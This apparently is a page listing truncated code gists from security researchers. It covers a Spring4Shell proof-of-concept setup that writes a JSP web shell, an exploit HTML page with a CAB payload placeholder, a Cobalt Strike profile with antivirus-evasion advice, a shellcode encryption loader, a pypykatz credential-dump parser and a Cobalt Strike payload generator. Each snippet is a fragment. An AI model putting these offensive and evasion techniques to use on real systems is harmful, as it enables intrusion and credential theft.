ustayready

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import ssl
import email
import argparse

esell

At this point, it is probably easier to just use something like this: https://github.com/reznok/Spring4Shell-POC


- clone https://spring.io/guides/gs/handling-form-submission/
- you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial
- modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy)
- install tomcat9 + java 11 (i did it on ubuntu 20.04)
- deploy the war file
- update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT

ihsangan

async function readRequestBody(request) {
  const { headers } = request;
  const contentType = headers.get('content-type') || '';
  if (contentType.includes('application/json')) {
    return JSON.stringify(await request.json());
  } else if (contentType.includes('form')) {
    const formData = await request.formData();
    const body = {};
    for (const entry of formData.entries()) {
      body[entry[0]] = entry[1];

D4stiny

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="X-UA-Compatible" content="IE=11">
</head>
<body>
    <script>
        var exploit_cab = "[CAB file URL]";

tothi

# in addition to the profile, a stage0 loader is also required (default generated payloads are caught by signatures)
# as stage0, remote injecting a thread into a suspended process works

set host_stage "false";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Edg/96.0.1054.62";
set sleeptime "10000";

stage {
  set allocator "MapViewOfFile";
  set name "notevil.dll";

Wra7h

//Compresses a file using the Windows API
//Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\Compress.cs
//Windows Compression API: https://docs.microsoft.com/en-us/windows/win32/api/_cmpapi/
//Supported Algorithms: https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor

// Takes a file, compresses it using one of the supported algorithms and creates a file with the compressed data.

using System;
using System.IO;
using System.Linq;

snovvcrash

#!/usr/bin/env python3

# Usage: GetZip.py 0.0.0.0 1337 [--xor 255] --md5 --parse
# Requirements: pip3 install tqdm pypykatz

import os
import socket
import zipfile
import hashlib
from argparse import ArgumentParser

jackullrich

#include <Windows.h>

LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo);
typedef VOID(__stdcall* Shellcode)();

LPBYTE ShellcodeBuffer;
ULONG_PTR PreviousOffset;
ULONG_PTR CurrentOffset;
ULONGLONG InstructionCount;
DWORD dwOld;

knavesec

<!DOCTYPE html>
<html>
<head>
	<title></title>
	<style type="text/css">

		body  {
			display: none !important;
      background:#FFFFFF !important;
		}

vestjoe

# Staged Payload Generator
# Author: @joevest
# Generates all stageless payload types for each current listener

# Directory for Payloads
mkdir("/payloads");

println("Stageless Payload Generator");

menubar("Stageless Payload Generator", "payloadgenerator");